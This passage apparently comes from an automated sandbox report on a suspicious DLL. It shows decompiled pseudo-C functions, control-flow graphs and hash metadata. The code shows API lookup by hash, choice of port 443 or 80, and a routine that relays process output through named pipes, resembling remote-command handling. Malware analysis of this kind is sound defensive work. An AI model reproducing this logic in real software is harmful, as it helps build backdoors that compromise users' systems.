                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800027D4(void* __ebx, void* __ecx, void* __edx, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t53;
                  				int _t56;
                  				void* _t60;
                  				void* _t62;
                  				void* _t66;
                  				int _t69;
                  				void* _t105;
                  				long long* _t124;
                  				long long* _t125;
                  				long long* _t126;
                  				long long* _t127;
                  				long long* _t128;
                  				void* _t156;
                  				void* _t157;
                  				intOrPtr* _t158;
                  				void* _t160;
                  				void* _t163;
                  				long long* _t166;
                  				void* _t168;
                  				void* _t169;
                  				long _t181;
                  				void* _t183;
                  				void* _t186;
                  				void* _t189;
                  
                  				_t128 = __rbx;
                  				 *((long long*)(_t168 + 0x10)) = __rbx;
                  				 *(_t168 + 0x18) = r8d;
                  				_t169 = _t168 - 0x50;
                  				_t124 =  *0x8000d4a0;
                  				_t161 =  *__rcx;
                  				_t158 = __rcx;
                  				r15d = r9d;
                  				_t53 = E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t163, __rdx, _t189, _t186);
                  				if (_t124 == _t128) goto 0x80002a78;
                  				_t105 =  *((char*)(_t158 + 0x75)) - 6;
                  				_t5 = _t128 + 4; // 0x4
                  				r12d = _t5;
                  				if (_t105 > 0) goto 0x8000283e;
                  				if (_t105 != 0) goto 0x80002835;
                  				if ( *((char*)(_t158 + 0x74)) - 2 > 0) goto 0x8000283e;
                  				 *((intOrPtr*)(_t169 + 0x90)) = 0;
                  				goto 0x80002846;
                  				 *((intOrPtr*)(_t169 + 0x90)) = r12d;
                  				E0000000118000459C(_t53, 0x3fe3c8ba,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t124 == _t128) goto 0x80002871;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t169 + 0x20)) = 0;
                  				 *_t124();
                  				goto 0x80002874;
                  				_t125 = _t128;
                  				 *((long long*)(_t158 + 0x28)) = _t125;
                  				_t56 = HeapFree(_t183, _t181, _t157);
                  				if ( *((intOrPtr*)(_t158 + 0x28)) == _t128) goto 0x80002a78;
                  				if ( *((intOrPtr*)(_t169 + 0xa0)) == 0) goto 0x800028ce;
                  				E0000000118000459C(_t56, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t125 == _t128) goto 0x800028c4;
                  				_t17 = _t169 + 0xa0; // 0x12
                  				r9d = r12d;
                  				 *_t125();
                  				goto 0x800028c6;
                  				if (0 == 0) goto 0x80002a78;
                  				_t60 = E00000001180007B04(_t128,  *((intOrPtr*)(_t158 + 8)), _t158, _t161, _t124, _t17, _t160, _t163);
                  				if (_t125 == _t128) goto 0x80002a78;
                  				 *((intOrPtr*)(_t169 + 0x90)) = 0x100;
                  				if ( *((intOrPtr*)(_t169 + 0xb0)) == 0) goto 0x80002938;
                  				 *((intOrPtr*)(_t169 + 0x40)) = 0xaa0;
                  				E0000000118000459C(_t60, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t125 == _t128) goto 0x80002927;
                  				r9d = r12d;
                  				_t62 =  *_t125();
                  				asm("bts dword [esp+0x90], 0x17");
                  				r12d = 0x1bb;
                  				goto 0x8000293e;
                  				r12d = 0x50;
                  				E0000000118000459C(_t62, 0x7dda0345,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t125 == _t128) goto 0x80002963;
                  				r9d = 0;
                  				r8d = r12w & 0xffffffff;
                  				 *_t125();
                  				goto 0x80002966;
                  				_t126 = _t128;
                  				 *((long long*)(_t158 + 0x30)) = _t126;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t158 + 0x30)) == _t128) goto 0x80002a78;
                  				_t66 = E00000001180007B04(_t128,  *((intOrPtr*)(_t158 + 0x10)), _t158, _t161, _t125, _t125);
                  				_t166 = _t126;
                  				if (_t126 == _t128) goto 0x80002a78;
                  				E0000000118000459C(_t66, 0xaa9d9fc1,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t126 == _t128) goto 0x800029ed;
                  				_t156 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 0x90));
                  				 *((long long*)(_t169 + 0x28)) = _t128;
                  				 *((long long*)(_t169 + 0x20)) = _t128;
                  				 *_t126();
                  				goto 0x800029f0;
                  				_t127 = _t128;
                  				 *((long long*)(_t158 + 0x38)) = _t127;
                  				_t69 = HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t158 + 0x38)) == _t128) goto 0x80002a78;
                  				 *((intOrPtr*)(_t169 + 0x44)) = 4;
                  				E0000000118000459C(_t69, 0x677ec78c,  *((intOrPtr*)(_t161 + 0x50)));
                  				_t45 = _t166 + 0x1b; // 0x1f
                  				r12d = _t45;
                  				if (_t127 == _t128) goto 0x80002a40;
                  				 *_t127();
                  				goto 0x80002a42;
                  				if (0 == 0) goto 0x80002a80;
                  				asm("bts dword [esp+0x90], 0x8");
                  				E0000000118000459C(0, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
                  				if (_t127 == _t128) goto 0x80002a80;
                  				r9d = 4;
                  				 *_t127();
                  				goto 0x80002a80;
                  				return GetLastError();
                  			}






























                  0x1800027d4
                  0x1800027d4
                  0x1800027d9
                  0x1800027e9
                  0x1800027ed
                  0x1800027f4
                  0x180002805
                  0x18000280d
                  0x180002810
                  0x18000281d
                  0x180002823
                  0x180002827
                  0x180002827
                  0x18000282b
                  0x18000282d
                  0x180002833
                  0x180002835
                  0x18000283c
                  0x18000283e
                  0x18000284f
                  0x180002857
                  0x180002860
                  0x180002863
                  0x180002869
                  0x18000286d
                  0x18000286f
                  0x180002871
                  0x18000287c
                  0x180002880
                  0x18000288a
                  0x180002897
                  0x1800028a2
                  0x1800028aa
                  0x1800028b0
                  0x1800028b8
                  0x1800028c0
                  0x1800028c2
                  0x1800028c8
                  0x1800028d4
                  0x1800028df
                  0x1800028e5
                  0x1800028f7
                  0x180002902
                  0x18000290a
                  0x180002912
                  0x18000291d
                  0x180002925
                  0x180002927
                  0x180002930
                  0x180002936
                  0x180002938
                  0x180002947
                  0x18000294f
                  0x180002955
                  0x180002958
                  0x18000295f
                  0x180002961
                  0x180002963
                  0x18000296e
                  0x180002972
                  0x18000297c
                  0x180002988
                  0x18000298d
                  0x180002993
                  0x1800029a2
                  0x1800029aa
                  0x1800029c9
                  0x1800029d4
                  0x1800029d7
                  0x1800029df
                  0x1800029e4
                  0x1800029e9
                  0x1800029eb
                  0x1800029ed
                  0x1800029f8
                  0x1800029fc
                  0x180002a06
                  0x180002a12
                  0x180002a1a
                  0x180002a1f
                  0x180002a1f
                  0x180002a26
                  0x180002a3c
                  0x180002a3e
                  0x180002a44
                  0x180002a46
                  0x180002a58
                  0x180002a60
                  0x180002a6e
                  0x180002a74
                  0x180002a76
                  0x180002a99

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocErrorLastlstrlenmemset
                  • String ID: P
                  • API String ID: 1242601240-3110715001
                  • Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
                  • Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
                  • Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 474 1800085a0-1800085a8 472->474 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 476 1800085aa CloseHandle 474->476 477 1800085b0-1800085b9 474->477 476->477 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->474 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 491 180008473-180008487 call 180004258 489->491 496 1800084b3 490->496 497 1800084a0-1800084b1 490->497 491->472 491->490 498 1800084b5-1800084b7 496->498 497->498 498->472 499 1800084bd-1800084c4 498->499 501 1800084c6-1800084e4 WriteFile 499->501 502 1800084ee-18000850a WaitForMultipleObjects 499->502 501->472 503 1800084ea 501->503 502->474 504 180008510-180008513 502->504 503->502 505 180008519-18000852a call 18000459c 504->505 506 1800085ba-1800085bf 504->506 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 508 1800085c1 506->508 508->484 512 180008546-18000854c 510->512 511->512 514 180008581 512->514 515 18000854e-18000856f WriteFile 512->515 516 180008583-180008585 514->516 517 1800085c6-1800085cb 514->517 518 180008571-18000857c ResetEvent 515->518 519 18000858b-180008591 GetLastError 515->519 516->484 516->519 517->474 518->484 519->486
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 17%
                  			E000000011800031D4(void* __ecx, long long __rbx, signed long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r8, char _a32) {
                  				void* _v40;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				long long _v88;
                  				void* _t43;
                  				void* _t45;
                  				intOrPtr _t47;
                  				void* _t48;
                  				void* _t71;
                  				void* _t72;
                  				long long _t83;
                  				long long _t85;
                  				long long _t86;
                  				signed long long _t97;
                  				intOrPtr _t109;
                  				CHAR* _t111;
                  				signed long long _t112;
                  				long long _t113;
                  				intOrPtr _t117;
                  				void* _t122;
                  				void* _t135;
                  				long _t137;
                  				long _t141;
                  				void* _t144;
                  				CHAR* _t146;
                  				long long* _t147;
                  
                  				_t87 = __rbx;
                  				_t135 = _t122;
                  				 *((long long*)(_t135 + 8)) = __rbx;
                  				 *((long long*)(_t135 + 0x10)) = __rbp;
                  				 *((long long*)(_t135 + 0x18)) = __rsi;
                  				_t83 =  *0x8000d4a0;
                  				_t4 = _t135 + 0x20; // -102
                  				_t147 = __r8;
                  				_t112 = __rcx;
                  				E00000001180006A84(_t72, __rbx, _t4, __rsi);
                  				if (_t83 == 0) goto 0x80003391;
                  				lstrlenA(_t146);
                  				r14d = _a32;
                  				_t8 = _t144 + 1; // 0x1
                  				r8d = _t83 + _t8;
                  				HeapAlloc(_t144, _t141, _t137);
                  				_v64 = _t83;
                  				if (_t83 == 0) goto 0x80003383;
                  				memcpy(??, ??, ??);
                  				lstrcpyA(_t111);
                  				r8d = lstrlenA(??);
                  				_t12 =  &_a32; // -6
                  				_v88 = _t12;
                  				_t43 = E00000001180001208(_t71, _t87, _t112, _t83, _t83,  *((intOrPtr*)(_t83 + 8)),  &_v56);
                  				HeapFree(??, ??, ??);
                  				if (_t43 != 0) goto 0x80003383;
                  				r8d = _a32;
                  				_t109 = _v56;
                  				_t16 =  &_v72; // -110
                  				_t85 = _t16;
                  				_t97 = _t112;
                  				_v88 = _t85;
                  				_t45 = E0000000118000467C(_t87, _t109, _t83,  *((intOrPtr*)(_t83 + 8)),  &_v64);
                  				_t117 = _v64;
                  				if (_v72 == 0) goto 0x800032ee;
                  				if ( *((char*)(_t109 + _t117)) != 0x3d) goto 0x800032ee;
                  				if (_t97 - 1 != 0) goto 0x800032df;
                  				 *((char*)(_t85 + _t117)) = 0;
                  				if (_t45 != 0) goto 0x80003365;
                  				_t86 =  *0x8000d4a0;
                  				_t47 = _t97 + 1 + _t97 * 2;
                  				r8d = _t47;
                  				_a32 = _t47;
                  				_t48 = HeapAlloc(??, ??, ??);
                  				_t113 = _t86;
                  				if (_t86 == 0) goto 0x80003360;
                  				r9d = 0;
                  				__imp__UrlEscapeA();
                  				if (_t48 != 0) goto 0x80003350;
                  				 *_t147 = _t113;
                  				 *(_t117 + _t113) = _t48;
                  				goto 0x80003365;
                  				HeapFree(??, ??, ??);
                  				goto 0x80003365;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return 8;
                  			}






























                  0x1800031d4
                  0x1800031d4
                  0x1800031d7
                  0x1800031db
                  0x1800031df
                  0x1800031f0
                  0x1800031fa
                  0x180003202
                  0x180003205
                  0x18000320d
                  0x180003218
                  0x180003221
                  0x180003227
                  0x180003231
                  0x180003231
                  0x180003239
                  0x180003242
                  0x18000324a
                  0x180003259
                  0x180003265
                  0x18000327c
                  0x18000327f
                  0x18000328a
                  0x18000328f
                  0x18000329e
                  0x1800032a6
                  0x1800032ac
                  0x1800032b4
                  0x1800032b9
                  0x1800032b9
                  0x1800032c3
                  0x1800032c6
                  0x1800032cb
                  0x1800032d4
                  0x1800032dd
                  0x1800032e6
                  0x1800032ec
                  0x1800032f0
                  0x1800032f6
                  0x1800032f8
                  0x180003305
                  0x180003309
                  0x18000330f
                  0x180003316
                  0x18000331c
                  0x180003322
                  0x18000332c
                  0x180003335
                  0x18000333f
                  0x180003348
                  0x18000334b
                  0x18000334e
                  0x180003358
                  0x18000335e
                  0x18000336d
                  0x18000337d
                  0x18000338b
                  0x1800033b0

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 31%
                  			E00000001180007950(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                  				int _t29;
                  				int _t34;
                  				void* _t35;
                  				void* _t54;
                  				intOrPtr* _t57;
                  				intOrPtr* _t74;
                  				intOrPtr* _t77;
                  				void* _t82;
                  				void* _t86;
                  
                  				if (__rcx == 0) goto 0x80007a7b;
                  				_t54 = _t82;
                  				 *((long long*)(_t54 + 8)) = __rbx;
                  				 *((long long*)(_t54 + 0x10)) = __rbp;
                  				 *((long long*)(_t54 + 0x18)) = __rsi;
                  				 *((long long*)(_t54 + 0x20)) = __rdi;
                  				_t57 = __rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x20)) == 0) goto 0x80007a57;
                  				E00000001180008308(SetEvent(_t86), _t35,  *0x8000d4a0, __rcx, __rcx + 0x10, __rbp);
                  				if ( *((long long*)(_t57 + 8)) == 0) goto 0x800079ba;
                  				WaitForSingleObject(??, ??);
                  				CloseHandle(??);
                  				if ( *((intOrPtr*)(_t57 + 0x28)) == 0) goto 0x800079c9;
                  				_t29 = CloseHandle(??);
                  				EnterCriticalSection(??);
                  				_t74 = _t57 + 0x88;
                  				_t77 =  *_t74;
                  				goto 0x800079eb;
                  				E00000001180008308(_t29, _t35,  *0x8000d4a0, _t57, _t77 - 0x10, __rbp);
                  				if ( *_t77 != _t74) goto 0x800079df;
                  				LeaveCriticalSection(??);
                  				goto 0x80007a09;
                  				Sleep(??);
                  				if ( *_t74 != _t74) goto 0x80007a01;
                  				if ( *((intOrPtr*)(_t57 + 0x40)) == 0) goto 0x80007a26;
                  				Sleep(??);
                  				r11d =  *((intOrPtr*)(_t57 + 0x40));
                  				if (r11d != 0) goto 0x80007a15;
                  				if ( *((intOrPtr*)(_t57 + 0x30)) == 0) goto 0x80007a35;
                  				CloseHandle(??);
                  				if ( *((intOrPtr*)(_t57 + 0x20)) == 0) goto 0x80007a44;
                  				CloseHandle(??);
                  				if ( *_t57 == 0) goto 0x80007a57;
                  				_t34 = HeapFree(??, ??, ??);
                  				DeleteCriticalSection(??);
                  				return _t34;
                  			}












                  0x180007953
                  0x180007959
                  0x18000795c
                  0x180007960
                  0x180007964
                  0x180007968
                  0x180007979
                  0x180007987
                  0x180007997
                  0x1800079a1
                  0x1800079aa
                  0x1800079b4
                  0x1800079c1
                  0x1800079c3
                  0x1800079cd
                  0x1800079d3
                  0x1800079da
                  0x1800079dd
                  0x1800079e6
                  0x1800079ee
                  0x1800079f4
                  0x1800079ff
                  0x180007a03
                  0x180007a0c
                  0x180007a13
                  0x180007a17
                  0x180007a1d
                  0x180007a24
                  0x180007a2d
                  0x180007a2f
                  0x180007a3c
                  0x180007a3e
                  0x180007a4a
                  0x180007a51
                  0x180007a5b
                  0x180007a7b

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 36%
                  			E0000000118000431C(void* __ecx, void* __edi, signed long long __rax, long long __rbx, intOrPtr* __rcx, void* __rdx) {
                  				void* __rdi;
                  				void* __rsi;
                  				long _t45;
                  				void* _t50;
                  				long _t75;
                  				signed long long _t123;
                  				signed long long _t124;
                  				intOrPtr* _t126;
                  				void* _t154;
                  				int _t161;
                  				void* _t165;
                  				long long _t168;
                  				void* _t170;
                  				void* _t171;
                  				void* _t178;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t123 = __rax;
                  				 *((long long*)(_t170 + 0x18)) = __rbx;
                  				 *((long long*)(_t170 + 0x20)) = _t168;
                  				_t171 = _t170 - 0x40;
                  				_t166 =  *0x8000d4a0;
                  				_t126 = __rcx;
                  				r14d = 0;
                  				_t45 = WaitForSingleObject(_t182);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(_t45, 0xb74c62f4,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t123 == _t182) goto 0x80004372;
                  				 *_t123();
                  				_t154 = _t126 + 0x4c;
                  				r8d = 0x10;
                  				E0000000118000459C(memcpy(_t180, _t178, _t161), 0x176fdd38,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t123 == _t182) goto 0x800043a9;
                  				_t10 = _t154 + 1; // 0x2
                  				_t11 = _t154 + 5; // 0x6
                  				r8d = _t11;
                  				_t50 =  *_t123();
                  				goto 0x800043ad;
                  				_t124 = _t123 | 0xffffffff;
                  				 *(_t126 + 0x10) = _t124;
                  				if (_t124 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(_t50, 0x66454c9c,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t124 == _t182) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t124();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				 *(_t171 + 0x70) = r14w;
                  				if (E00000001180008150(_t10, __edi, _t126,  *(_t126 + 0x10),  *_t126, _t161,  *0x8000d4a0, _t168, _t171 + 0x70, _t165) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d =  *(_t171 + 0x70) & 0x0000ffff;
                  				if (E000000011800091F8(_t126, _t126,  *(_t126 + 0x10), _t166, _t168) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t57, _t10, _t124, _t126, _t126 + 0x10, _t168);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t126 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(_t62, 0x544646d0,  *((intOrPtr*)(_t126 + 0x20)));
                  				if (_t124 == _t182) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t124();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				 *((intOrPtr*)(_t171 + 0x78)) = 0x10;
                  				E0000000118000459C(r14d, 0xd0aed27e,  *((intOrPtr*)(_t166 + 0x30)));
                  				if (_t124 == _t182) goto 0x800044f2;
                  				 *_t124();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				E0000000118000459C(SetEvent(??), 0xa1aa58b7,  *((intOrPtr*)(_t166 + 0x30)));
                  				if (_t124 == _t182) goto 0x8000452c;
                  				 *_t124();
                  				goto 0x80004530;
                  				if ((_t124 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t126, _t126, _t124 | 0xffffffff, _t166, _t168) == r14d) goto 0x80004504;
                  				E0000000118000459C(_t72, 0xb74c62f4,  *((intOrPtr*)(_t166 + 0x30)));
                  				if (_t124 == _t182) goto 0x80004504;
                  				 *_t124();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}




















                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x18000432e
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
